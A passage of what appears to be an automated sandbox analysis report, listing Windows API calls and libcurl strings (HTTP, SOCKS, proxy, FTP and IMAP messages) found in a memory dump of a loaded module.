                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                  APIs
                                                                                                                                  • socket.WS2_32(00000017,00000002,00000000), ref: 6B8E8A3D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: socket
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 98920635-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6B92F3F7: _free.LIBCMT ref: 6B92F40D
                                                                                                                                    • Part of subcall function 6B92F3F7: _free.LIBCMT ref: 6B92F419
                                                                                                                                    • Part of subcall function 6B92F3F7: _free.LIBCMT ref: 6B92F424
                                                                                                                                    • Part of subcall function 6B92F3F7: _free.LIBCMT ref: 6B92F42F
                                                                                                                                    • Part of subcall function 6B92F3F7: _free.LIBCMT ref: 6B92F43A
                                                                                                                                    • Part of subcall function 6B92F3F7: _free.LIBCMT ref: 6B92F445
                                                                                                                                    • Part of subcall function 6B92F3F7: _free.LIBCMT ref: 6B92F450
                                                                                                                                    • Part of subcall function 6B92F3F7: _free.LIBCMT ref: 6B92F45B
                                                                                                                                    • Part of subcall function 6B92F3F7: _free.LIBCMT ref: 6B92F466
                                                                                                                                    • Part of subcall function 6B92F3F7: _free.LIBCMT ref: 6B92F474
                                                                                                                                  • _free.LIBCMT ref: 6B92F3EC
                                                                                                                                    • Part of subcall function 6B92F7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B935EE0,6B9538A0,00000000,6B9538A0,00000000,?,6B935F07,6B9538A0,00000007,6B9538A0,?,6B93532A,6B9538A0), ref: 6B92F800
                                                                                                                                    • Part of subcall function 6B92F7EA: GetLastError.KERNEL32(6B9538A0,?,6B935EE0,6B9538A0,00000000,6B9538A0,00000000,?,6B935F07,6B9538A0,00000007,6B9538A0,?,6B93532A,6B9538A0,6B9538A0), ref: 6B92F812
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  APIs
                                                                                                                                  • ioctlsocket.WS2_32(00000000,8004667E,6B8D4554), ref: 6B8FA67A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ioctlsocket
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3577187118-0
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 6B9280C8
                                                                                                                                    • Part of subcall function 6B92F7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B935EE0,6B9538A0,00000000,6B9538A0,00000000,?,6B935F07,6B9538A0,00000007,6B9538A0,?,6B93532A,6B9538A0), ref: 6B92F800
                                                                                                                                    • Part of subcall function 6B92F7EA: GetLastError.KERNEL32(6B9538A0,?,6B935EE0,6B9538A0,00000000,6B9538A0,00000000,?,6B935F07,6B9538A0,00000007,6B9538A0,?,6B93532A,6B9538A0,6B9538A0), ref: 6B92F812
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFreeHeapLast_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1353095263-0
                                                                                                                                  APIs
                                                                                                                                  • curl_maprintf.LIBCURL(%s?%s,?,?), ref: 6B8E8C68
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_maprintf
                                                                                                                                  • String ID: %s$%s $%s HTTP/%s%s%s%s%s%s%s%s%s%s%s%s%s$%s%s$%s%s=%s$%s: %s, %02d %s %4d %02d:%02d:%02d GMT$%s?%s$%x$/$0$1.0$1.1$100-continue$;type=$;type=%c$?%s$Accept$Accept-Encoding$Accept-Encoding: %s$Accept: */*$Chunky upload is not supported by HTTP 1.0$Content-Length$Content-Length: %I64d$Content-Length: 0$Content-Range$Content-Range: bytes %s%I64d/%I64d$Content-Range: bytes %s/%I64d$Content-Range: bytes 0-%I64d/%I64d$Content-Type$Content-Type: application/x-www-form-urlencoded$Cookie$Cookie: $Could not seek stream$Could only read %I64d bytes from the input$Expect$Expect:$Failed sending HTTP POST request$Failed sending HTTP request$Failed sending POST request$Failed sending PUT request$File already completely uploaded$GET$HEAD$Host$Host:$Host: %s%s%s$Host: %s%s%s:%d$Host:%s$If-Modified-Since$If-Unmodified-Since$Invalid TIMEVALUE$Last-Modified$POST$PUT$Proxy-Connection$Proxy-Connection: Keep-Alive$Range$Range: bytes=%s$Referer$Referer: %s$Transfer-Encoding$Transfer-Encoding:$Transfer-Encoding: chunked$User-Agent$chunked$ftp$ftp://%s:%s@%s$http$multipart/form-data$upload completely sent off: %I64d out of %I64d bytes
                                                                                                                                  • API String ID: 3307269620-2642765789
                                                                                                                                  APIs
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8DEFA1
                                                                                                                                  • _strncpy.LIBCMT ref: 6B8DEFC7
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8DEFE8
                                                                                                                                  • inet_pton.WS2_32(00000017,?,?), ref: 6B8DF006
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8DF078
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8DF0A9
                                                                                                                                  • curl_pushheader_bynum.LIBCURL(?,00000000,00000401), ref: 6B8DF135
                                                                                                                                  • getsockname.WS2_32(?,?,?), ref: 6B8DF1CC
                                                                                                                                  • WSAGetLastError.WS2_32(?,00000100), ref: 6B8DF1E2
                                                                                                                                  • WSAGetLastError.WS2_32 ref: 6B8DF2ED
                                                                                                                                  • bind.WS2_32(FFFFFFFF,00000017,00000080), ref: 6B8DF396
                                                                                                                                  • WSAGetLastError.WS2_32 ref: 6B8DF3A4
                                                                                                                                  • getsockname.WS2_32(?,00000017,00000080), ref: 6B8DF407
                                                                                                                                  • WSAGetLastError.WS2_32(?,00000100), ref: 6B8DF452
                                                                                                                                    • Part of subcall function 6B90A0E0: GetLastError.KERNEL32(?,?,00000100), ref: 6B90A0E7
                                                                                                                                    • Part of subcall function 6B9005D0: curl_mvsnprintf.LIBCURL(?,00000100,6B8FC830,?), ref: 6B900610
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$___from_strstr_to_strchr$getsockname$_strncpybindcurl_mvsnprintfcurl_pushheader_bynuminet_pton
                                                                                                                                  • String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$PORT$bind() failed, we ran out of ports!$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
                                                                                                                                  Strings
                                                                                                                                  • SOCKS5 GSS-API protection not yet implemented., xrefs: 6B90802E
                                                                                                                                  • Unable to send initial SOCKS5 request., xrefs: 6B9078B0
                                                                                                                                  • SOCKS5 request granted., xrefs: 6B908259
                                                                                                                                  • SOCKS5 GSSAPI per-message authentication is not supported., xrefs: 6B907A2F
                                                                                                                                  • SOCKS5 connect to IPv6 %s (locally resolved), xrefs: 6B907EB5
                                                                                                                                  • Unable to receive initial SOCKS5 response., xrefs: 6B907861
                                                                                                                                  • Connection to proxy closed, xrefs: 6B90790D
                                                                                                                                  • Failed to send SOCKS5 sub-negotiation request., xrefs: 6B907BA7
                                                                                                                                  • Excessive user name length for proxy auth, xrefs: 6B907AC3
                                                                                                                                  • Failed to resolve "%s" for SOCKS5 connect., xrefs: 6B907F06
                                                                                                                                  • Failed to send SOCKS5 connect request., xrefs: 6B907FED
                                                                                                                                  • Unable to receive SOCKS5 sub-negotiation response., xrefs: 6B907C2C
                                                                                                                                  • unknown, xrefs: 6B90760C
                                                                                                                                  • :%d, xrefs: 6B907D63
                                                                                                                                  • connection to proxy closed, xrefs: 6B90821A
                                                                                                                                  • SOCKS5 connection to %s not supported, xrefs: 6B907EDE
                                                                                                                                  • Undocumented SOCKS5 mode attempted to be used by server., xrefs: 6B907A7B
                                                                                                                                  • warning: unsupported value passed to CURLOPT_SOCKS5_AUTH: %lu, xrefs: 6B907737
                                                                                                                                  • Failed to receive SOCKS5 connect request ack., xrefs: 6B90809F, 6B9081CE
                                                                                                                                  • SOCKS5: connecting to HTTP proxy %s port %d, xrefs: 6B9076ED
                                                                                                                                  • Can't complete SOCKS5 connection to %s. (%d), xrefs: 6B908118
                                                                                                                                  • User was rejected by the SOCKS5 server (%d %d)., xrefs: 6B907C75
                                                                                                                                  • SOCKS5: server resolving disabled for hostnames of length > 255 [actual len=%zu], xrefs: 6B907712
                                                                                                                                  • Excessive password length for proxy auth, xrefs: 6B907B23
                                                                                                                                  • No authentication method was acceptable., xrefs: 6B907A57
                                                                                                                                  • SOCKS5 reply has wrong version, version should be 5., xrefs: 6B9080DE
                                                                                                                                  • SOCKS5 reply has wrong address type., xrefs: 6B9081F2
                                                                                                                                  • Received invalid version in initial SOCKS5 response., xrefs: 6B907940
                                                                                                                                  • SOCKS5 connect to IPv4 %s (locally resolved), xrefs: 6B907DD3
                                                                                                                                  • SOCKS5 connect to %s:%d (remotely resolved), xrefs: 6B907F70
                                                                                                                                  • Unable to negotiate SOCKS5 GSS-API context., xrefs: 6B907A0B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_mvsnprintf$curl_msnprintf
                                                                                                                                  • String ID: :%d$Can't complete SOCKS5 connection to %s. (%d)$Connection to proxy closed$Excessive password length for proxy auth$Excessive user name length for proxy auth$Failed to receive SOCKS5 connect request ack.$Failed to resolve "%s" for SOCKS5 connect.$Failed to send SOCKS5 connect request.$Failed to send SOCKS5 sub-negotiation request.$No authentication method was acceptable.$Received invalid version in initial SOCKS5 response.$SOCKS5 GSS-API protection not yet implemented.$SOCKS5 GSSAPI per-message authentication is not supported.$SOCKS5 connect to %s:%d (remotely resolved)$SOCKS5 connect to IPv4 %s (locally resolved)$SOCKS5 connect to IPv6 %s (locally resolved)$SOCKS5 connection to %s not supported$SOCKS5 reply has wrong address type.$SOCKS5 reply has wrong version, version should be 5.$SOCKS5 request granted.$SOCKS5: connecting to HTTP proxy %s port %d$SOCKS5: server resolving disabled for hostnames of length > 255 [actual len=%zu]$Unable to negotiate SOCKS5 GSS-API context.$Unable to receive SOCKS5 sub-negotiation response.$Unable to receive initial SOCKS5 response.$Unable to send initial SOCKS5 request.$Undocumented SOCKS5 mode attempted to be used by server.$User was rejected by the SOCKS5 server (%d %d).$connection to proxy closed$unknown$warning: unsupported value passed to CURLOPT_SOCKS5_AUTH: %lu
                                                                                                                                  APIs
                                                                                                                                  • curl_pushheader_bynum.LIBCURL(?,?,?,?,?,00000100,?,?,?,?,?,?,?,?,?,?), ref: 6B8D3AC2
                                                                                                                                  • inet_pton.WS2_32(00000017,?,?), ref: 6B8D3BA2
                                                                                                                                  • htons.WS2_32(?), ref: 6B8D3BB9
                                                                                                                                  • inet_pton.WS2_32(00000002,?,?), ref: 6B8D3CED
                                                                                                                                  • htons.WS2_32(?), ref: 6B8D3D08
                                                                                                                                    • Part of subcall function 6B9006B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,6B8F6C24), ref: 6B9006EF
                                                                                                                                    • Part of subcall function 6B9006B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B90072F
                                                                                                                                  • bind.WS2_32(?,?,00000000), ref: 6B8D3DAF
                                                                                                                                  • htons.WS2_32(?), ref: 6B8D3DE9
                                                                                                                                  • bind.WS2_32(?,?,00000000), ref: 6B8D3E02
                                                                                                                                  • getsockname.WS2_32(?,?,00000080), ref: 6B8D3E3D
                                                                                                                                  • WSAGetLastError.WS2_32 ref: 6B8D3E4B
                                                                                                                                  • WSAGetLastError.WS2_32 ref: 6B8D3E91
                                                                                                                                  Strings
                                                                                                                                  • Couldn't bind to '%s', xrefs: 6B8D3D26
                                                                                                                                  • Couldn't bind to interface '%s', xrefs: 6B8D3BE4
                                                                                                                                  • Local port: %hu, xrefs: 6B8D3EDB
                                                                                                                                  • Bind to local port %hu failed, trying next, xrefs: 6B8D3DD9
                                                                                                                                  • getsockname() failed with errno %d: %s, xrefs: 6B8D3E6D
                                                                                                                                  • Name '%s' family %i resolved to '%s' family %i, xrefs: 6B8D3C90
                                                                                                                                  • Local Interface %s is ip %s using address family %i, xrefs: 6B8D3B78
                                                                                                                                  • bind failed with errno %d: %s, xrefs: 6B8D3EB3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: htons$ErrorLastbindinet_pton$curl_msnprintfcurl_mvsnprintfcurl_pushheader_bynumgetsockname
                                                                                                                                  • String ID: Bind to local port %hu failed, trying next$Couldn't bind to '%s'$Couldn't bind to interface '%s'$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$getsockname() failed with errno %d: %s
                                                                                                                                  Strings
                                                                                                                                  • connection to proxy closed, xrefs: 6B9073BA
                                                                                                                                  • SOCKS4%s request granted., xrefs: 6B90744B
                                                                                                                                  • Hostname '%s' was found, xrefs: 6B907113
                                                                                                                                  • SOCKS4 reply has wrong version, version should be 0., xrefs: 6B907403
                                                                                                                                  • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client., xrefs: 6B9074DC
                                                                                                                                  • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown., xrefs: 6B90756A
                                                                                                                                  • Failed to send SOCKS4 connect request., xrefs: 6B9072D1
                                                                                                                                  • SOCKS4: Failed receiving connect request ack: %s, xrefs: 6B907392
                                                                                                                                  • SOCKS4 connect to IPv4 %s (locally resolved), xrefs: 6B907188
                                                                                                                                  • SOCKS4: too long host name, xrefs: 6B9072F5
                                                                                                                                  • Too long SOCKS proxy user name, can't use!, xrefs: 6B9070C9
                                                                                                                                  • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed., xrefs: 6B907495
                                                                                                                                  • SOCKS4 non-blocking resolve of %s, xrefs: 6B907064
                                                                                                                                  • SOCKS4%s: connecting to HTTP proxy %s port %d, xrefs: 6B906FF6
                                                                                                                                  • SOCKS4 communication to %s:%d, xrefs: 6B90700A
                                                                                                                                  • Failed to resolve "%s" for SOCKS4 connect., xrefs: 6B9071FD
                                                                                                                                  • SOCKS4 connection to %s not supported, xrefs: 6B9071D6
                                                                                                                                  • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids., xrefs: 6B907523
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_mvsnprintf
                                                                                                                                  • String ID: Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.$Failed to resolve "%s" for SOCKS4 connect.$Failed to send SOCKS4 connect request.$Hostname '%s' was found$SOCKS4 communication to %s:%d$SOCKS4 connect to IPv4 %s (locally resolved)$SOCKS4 connection to %s not supported$SOCKS4 non-blocking resolve of %s$SOCKS4 reply has wrong version, version should be 0.$SOCKS4%s request granted.$SOCKS4%s: connecting to HTTP proxy %s port %d$SOCKS4: Failed receiving connect request ack: %s$SOCKS4: too long host name$Too long SOCKS proxy user name, can't use!$connection to proxy closed
                                                                                                                                  APIs
                                                                                                                                  • curl_getenv.LIBCURL(NO_PROXY,00000000), ref: 6B8E3B74
                                                                                                                                    • Part of subcall function 6B8E4770: curl_url.LIBCURL(00000000,00000000,6B8E2F71), ref: 6B8E478E
                                                                                                                                    • Part of subcall function 6B8E4770: curl_url_set.LIBCURL(00000000,00000000,00000000,00000208,00000000,00000000,6B8E2F71), ref: 6B8E47A6
                                                                                                                                    • Part of subcall function 6B8E4770: curl_url_get.LIBCURL(6B8E2F71,00000001,00000000,00000000,?,00000000,00000000,6B8E2F71), ref: 6B8E47C0
                                                                                                                                    • Part of subcall function 6B8E4770: curl_url_cleanup.LIBCURL(6B8E2F71,?,?,?,?,00000000,00000000,6B8E2F71), ref: 6B8E4A84
                                                                                                                                  • curl_getenv.LIBCURL(no_proxy), ref: 6B8E3B5C
                                                                                                                                    • Part of subcall function 6B8E6310: GetEnvironmentVariableA.KERNEL32(?,00000000,00000001), ref: 6B8E633A
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8E3BF7
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8E3C4D
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8E3C80
                                                                                                                                  • curl_getenv.LIBCURL(?), ref: 6B8E3D7B
                                                                                                                                  • curl_getenv.LIBCURL(?,?,?,00000080,?,?,00000000), ref: 6B8E3DC0
                                                                                                                                  • curl_getenv.LIBCURL(all_proxy,00000000), ref: 6B8E3DE0
                                                                                                                                  • curl_getenv.LIBCURL(ALL_PROXY,?,00000000), ref: 6B8E3DFA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_getenv$___from_strstr_to_strchr$EnvironmentVariablecurl_urlcurl_url_cleanupcurl_url_getcurl_url_set
                                                                                                                                  • String ID: ALL_PROXY$NO_PROXY$Uses proxy env variable %s == '%s'$_proxy$all_proxy$http_proxy$memory shortage$no_proxy
                                                                                                                                  APIs
                                                                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 6B90AE75
                                                                                                                                  • WSACleanup.WS2_32 ref: 6B90AE90
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,?,?), ref: 6B90AEBF
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 6B90AEDD
                                                                                                                                  • _strpbrk.LIBCMT ref: 6B90AEEF
                                                                                                                                  • LoadLibraryA.KERNEL32(iphlpapi.dll,?,?), ref: 6B90AF16
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,AddDllDirectory), ref: 6B90AF2D
                                                                                                                                  • GetSystemDirectoryA.KERNEL32(00000000,00000000), ref: 6B90AF50
                                                                                                                                  • GetSystemDirectoryA.KERNEL32(00000000,?), ref: 6B90AF7E
                                                                                                                                  • LoadLibraryA.KERNEL32(00000000,?,?,?), ref: 6B90AFDB
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,if_nametoindex), ref: 6B90AFFE
                                                                                                                                  • QueryPerformanceFrequency.KERNEL32(6B953B50,?,?,?,?,?,?), ref: 6B90B033
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$DirectoryLibraryLoadSystem$CleanupFrequencyHandleModulePerformanceQueryStartup_strpbrk
                                                                                                                                  • String ID: AddDllDirectory$LoadLibraryExA$if_nametoindex$iphlpapi.dll$kernel32
                                                                                                                                  APIs
                                                                                                                                  • curl_multi_remove_handle.LIBCURL(?,?,?,00000000,00000000), ref: 6B8FDD78
                                                                                                                                    • Part of subcall function 6B9005D0: curl_mvsnprintf.LIBCURL(?,00000100,6B8FC830,?), ref: 6B900610
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_multi_remove_handlecurl_mvsnprintf
                                                                                                                                  • String ID: %s$%s%02x%02x$AAAA$CNAME: %s$Could not DOH-resolve: %s$DOH A: %u.%u.%u.%u$DOH AAAA: $DOH Host name: %s$DOH: %s type %s for %s$TTL: %u seconds$bad error code
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %%25%s]$%ld$%s://%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$file$file://%s%s%s$https
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ACCT rejected by server: %03d$AUTH %s$CCC$Entry path is '%s'$Failed to clear the command channel (CCC)$Failed to figure out path$Got a %03d ftp-server response when 220 was expected$PROT %c$SYST$We got a 421 - timeout!$unsupported parameter to CURLOPT_FTPSSLAUTH: %d
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: alnum$alpha$blank$digit$graph$lower$print$space$upper$xdigit
                                                                                                                                  Strings
                                                                                                                                  • Mailbox UIDVALIDITY has changed, xrefs: 6B8F0F05
                                                                                                                                  • Select failed, xrefs: 6B8F0F62
                                                                                                                                  • OK [UIDVALIDITY %19[0123456789]], xrefs: 6B8F0EA0
                                                                                                                                  • Authentication cancelled, xrefs: 6B8F0DE7
                                                                                                                                  • STARTTLS denied, xrefs: 6B8F0D51
                                                                                                                                  • Access denied. %c, xrefs: 6B8F0E0B
                                                                                                                                  • CAPABILITY, xrefs: 6B8F0CED
                                                                                                                                  • PREAUTH connection, already authenticated!, xrefs: 6B8F0CCD
                                                                                                                                  • Got unexpected imap-server response, xrefs: 6B8F100E
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Access denied. %c$Authentication cancelled$CAPABILITY$Got unexpected imap-server response$Mailbox UIDVALIDITY has changed$OK [UIDVALIDITY %19[0123456789]]$PREAUTH connection, already authenticated!$STARTTLS denied$Select failed
                                                                                                                                  APIs
                                                                                                                                  • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000040), ref: 6B8F20C3
